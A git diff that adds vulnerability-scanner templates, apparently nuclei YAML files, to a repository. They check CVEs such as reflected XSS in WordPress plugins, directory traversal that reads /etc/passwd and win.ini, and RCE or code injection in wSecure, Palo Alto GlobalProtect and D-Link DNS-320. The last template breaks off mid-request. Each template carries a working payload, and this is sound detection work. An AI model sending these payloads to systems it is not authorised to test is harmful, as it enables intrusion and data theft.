diff --git a/README.md b/README.md index b2ebc20708..b6fb139ccd 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 430 | vulnerabilities | 233 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 120 | +| cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | +| takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 37 | file | 42 | dns | 10 | +| default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1551 files**. +**134 directories, 1596 files**. diff --git a/cves/2009/CVE-2009-1558.yaml b/cves/2009/CVE-2009-1558.yaml new file mode 100644 index 0000000000..f56848b401 --- /dev/null +++ b/cves/2009/CVE-2009-1558.yaml @@ -0,0 +1,24 @@ +id: CVE-2009-1558 + +info: + name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. + reference: https://www.exploit-db.com/exploits/32954 + tags: cve,cve2009,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml new file mode 100644 index 0000000000..25c8832501 --- /dev/null +++ b/cves/2012/CVE-2012-1835.yaml @@ -0,0 +1,34 @@ +id: CVE-2012-1835 + +info: + name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml new file mode 100644 index 0000000000..d6883d7e82 --- /dev/null +++ b/cves/2013/CVE-2013-3827.yaml @@ -0,0 +1,38 @@ +id: CVE-2013-3827 + +info: + name: Javafaces LFI + author: Random-Robbie + severity: medium + description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. + tags: cve,cve2013,lfi,javafaces,oracle + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2013-3827 + - https://www.exploit-db.com/exploits/38802 + +requests: + - method: GET + path: + - "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml new file mode 100644 index 0000000000..83fc34ed8d --- /dev/null +++ b/cves/2016/CVE-2016-1000128.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000128 + +info: + name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml new file mode 100644 index 0000000000..d76c910dcf --- /dev/null +++ b/cves/2016/CVE-2016-1000129.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000129 + +info: + name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml new file mode 100644 index 0000000000..36392e35d4 --- /dev/null +++ b/cves/2016/CVE-2016-1000130.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000130 + +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin e-search v1.0 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml new file mode 100644 index 0000000000..1e540169b2 --- /dev/null +++ b/cves/2016/CVE-2016-1000131.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000131 + +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml new file mode 100644 index 0000000000..e72ea63c7b --- /dev/null +++ b/cves/2016/CVE-2016-1000132.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000132 + +info: + name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&msg=imported" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml new file mode 100644 index 0000000000..658b8562e7 --- /dev/null +++ b/cves/2016/CVE-2016-1000133.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000133 + +info: + name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%22%20%3C%2Fscript%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml new file mode 100644 index 0000000000..1f35214f3d --- /dev/null +++ b/cves/2016/CVE-2016-1000134.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000134 + +info: + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin hdw-tube v1.2 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml new file mode 100644 index 0000000000..ba16e3c957 --- /dev/null +++ b/cves/2016/CVE-2016-1000135.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000135 + +info: + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin hdw-tube v1.2 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml new file mode 100644 index 0000000000..68f7e2616c --- /dev/null +++ b/cves/2016/CVE-2016-10960.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-10960 + +info: + name: wSecure Lite < 2.4 - Remote Code Execution (RCE) + author: daffainfo + severity: critical + description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. + reference: | + - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ + - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 + tags: cve,cve2016,wordpress,wp-plugin,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" + body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="' + + matchers-condition: and + matchers: + - type: word + words: + - "Nuclei: CVE-2016-10960" + condition: and + part: header + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index 45e7bfda4b..2d6bd7fbd0 100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml @@ -2,23 +2,27 @@ id: CVE-2017-15944 info: name: PreAuth RCE on Palo Alto GlobalProtect - author: emadshanab - reference: http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html + author: emadshanab,milo2012 + reference: | + - https://www.exploit-db.com/exploits/43342 + - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html severity: high - tags: cve,cve2017,rce,vpn,paloalto + tags: cve,cve2017,rce,vpn,paloalto,globalprotect requests: - - method: GET - path: - - "{{BaseURL}}/global-protect/portal/css/login.css" + - raw: + - | + GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID={{randstr}}; matchers-condition: and matchers: - type: word words: - - "Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT" - part: header + - "@start@Success@end@" + part: body - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml new file mode 100644 index 0000000000..3d321b4c8f --- /dev/null +++ b/cves/2017/CVE-2017-17043.yaml @@ -0,0 +1,30 @@ +id: CVE-2017-17043 + +info: + name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml new file mode 100644 index 0000000000..ecf71fafc7 --- /dev/null +++ b/cves/2017/CVE-2017-17059.yaml @@ -0,0 +1,34 @@ +id: CVE-2017-17059 + +info: + name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php. + reference: | + - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 + - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1" + + body: "amty_hidden=1" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml new file mode 100644 index 0000000000..40a4e59745 --- /dev/null +++ b/cves/2017/CVE-2017-17451.yaml @@ -0,0 +1,30 @@ +id: CVE-2017-17451 + +info: + name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml new file mode 100644 index 0000000000..5ac65f849b --- /dev/null +++ b/cves/2017/CVE-2017-18536.yaml @@ -0,0 +1,30 @@ +id: CVE-2017-18536 + +info: + name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. + reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml new file mode 100644 index 0000000000..19bdc03839 --- /dev/null +++ b/cves/2017/CVE-2017-9288.yaml @@ -0,0 +1,30 @@ +id: CVE-2017-9288 + +info: + name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter). + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml new file mode 100644 index 0000000000..4f305a6330 --- /dev/null +++ b/cves/2018/CVE-2018-11709.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-11709 + +info: + name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml new file mode 100644 index 0000000000..0fc4b182f1 --- /dev/null +++ b/cves/2018/CVE-2018-12031.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-12031 + +info: + name: Eaton Intelligent Power Manager 1.6 - Directory Traversal + author: daffainfo + severity: high + description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. + reference: | + - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion + - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 + - https://www.exploit-db.com/exploits/48614 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + - "\\[(font|extension|file)s\\]" + condition: or + part: body + - type: status + status: + - 200 diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml new file mode 100644 index 0000000000..79a0cbd39f --- /dev/null +++ b/cves/2018/CVE-2018-20462.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-20462 + +info: + name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2018/CVE-2018-5316.yaml b/cves/2018/CVE-2018-5316.yaml new file mode 100644 index 0000000000..7553a25625 --- /dev/null +++ b/cves/2018/CVE-2018-5316.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-5316 + +info: + name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml new file mode 100644 index 0000000000..093014e337 --- /dev/null +++ b/cves/2019/CVE-2019-12616.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-12616 + +info: + name: phpMyAdmin CSRF + author: Mohammedsaneem + description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. + severity: medium + tags: cve,cve2019,phpmyadmin,csrf + reference: | + - https://www.phpmyadmin.net/security/PMASA-2019-4/ + - https://www.exploit-db.com/exploits/46982 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/" + + matchers-condition: and + matchers: + - type: word + words: + - "4.6.6deb4+deb9u2" + - "phpMyAdmin" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml new file mode 100644 index 0000000000..55c9e48f5d --- /dev/null +++ b/cves/2019/CVE-2019-15713.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-15713 + +info: + name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. + reference: | + - https://wpscan.com/vulnerability/9267 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml new file mode 100644 index 0000000000..f067dd1e34 --- /dev/null +++ b/cves/2019/CVE-2019-16332.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-16332 + +info: + name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS. + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml new file mode 100644 index 0000000000..3ff0907f88 --- /dev/null +++ b/cves/2019/CVE-2019-16525.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-16525 + +info: + name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code. + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%3C%2Fpath%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml new file mode 100644 index 0000000000..1c31973d6b --- /dev/null +++ b/cves/2019/CVE-2019-20085.yaml @@ -0,0 +1,26 @@ +id: CVE-2019-20085 + +info: + name: TVT NVMS 1000 - Directory Traversal + author: daffainfo + severity: high + description: TVT NVMS-1000 devices allow GET /.. Directory Traversal + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 + - https://www.exploit-db.com/exploits/48311 + tags: cve,cve2019,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini" + + matchers-condition: and + matchers: + - type: regex + regex: + - "\\[(font|extension|file)s\\]" + part: body + - type: status + status: + - 200 diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml index e937c8a86e..11b19bcd64 100644 --- a/cves/2020/CVE-2020-12054.yaml +++ b/cves/2020/CVE-2020-12054.yaml @@ -18,7 +18,9 @@ requests: - type: word words: - "" + - "catch-breadcrumb" part: body + condition: and - type: word part: header diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml index 2e265da33c..0fdc277777 100644 --- a/cves/2020/CVE-2020-17362.yaml +++ b/cves/2020/CVE-2020-17362.yaml @@ -20,6 +20,11 @@ requests: - "" part: body + - type: word + words: + - "nova-lite" + part: body + - type: word part: header words: diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml new file mode 100644 index 0000000000..18de468cad --- /dev/null +++ b/cves/2020/CVE-2020-25506.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-25506 + +info: + name: D-Link DNS-320 - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. + reference: | + - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 + - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ + tags: cve,cve2020,dlink,rce,oob + +requests: + - raw: + - | + POST /cgi-bin/system_mgr.cgi? HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; 